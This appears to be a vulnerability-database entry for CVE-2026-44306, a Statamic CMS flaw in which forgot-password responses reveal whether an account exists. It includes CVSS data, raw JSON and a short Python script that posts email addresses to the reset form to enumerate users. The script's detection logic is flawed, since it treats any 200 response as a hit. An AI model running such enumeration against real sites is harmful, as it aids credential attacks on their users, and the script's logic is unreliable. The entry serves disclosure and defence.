Security Vulnerability Report
中文
CVE-2026-44306 CVSS 5.3 MEDIUM

CVE-2026-44306

Published: 2026-05-12 22:16:37
Last Modified: 2026-05-12 22:16:37

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.21 and 6.15.0, responses from the forgot password forms hinted at whether an account existed for a given email address. An unauthenticated attacker could use this to enumerate valid users, which can aid in follow-up credential-based attacks. This vulnerability is fixed in 5.73.21 and 6.15.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Statamic CMS < 5.73.21
Statamic CMS < 6.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (example) target_url = "http://target.com/!/forgot-password" email_list = ["[email protected]", "[email protected]", "[email protected]"] for email in email_list: # Payload data payload = {"email": email} try: response = requests.post(target_url, data=payload) # Analyze response to determine if user exists # Logic depends on specific application behavior (e.g., status code or text) if "如果该邮箱存在" in response.text or response.status_code == 200: print(f"[+] User found: {email}") else: print(f"[-] User not found: {email}") except Exception as e: print(f"Error checking {email}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44306", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:37.413", "lastModified": "2026-05-12T22:16:37.413", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.21 and 6.15.0, responses from the forgot password forms hinted at whether an account existed for a given email address. An unauthenticated attacker could use this to enumerate valid users, which can aid in follow-up credential-based attacks. This vulnerability is fixed in 5.73.21 and 6.15.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-m24v-f7g5-gq67", "source": "[email protected]"}]}}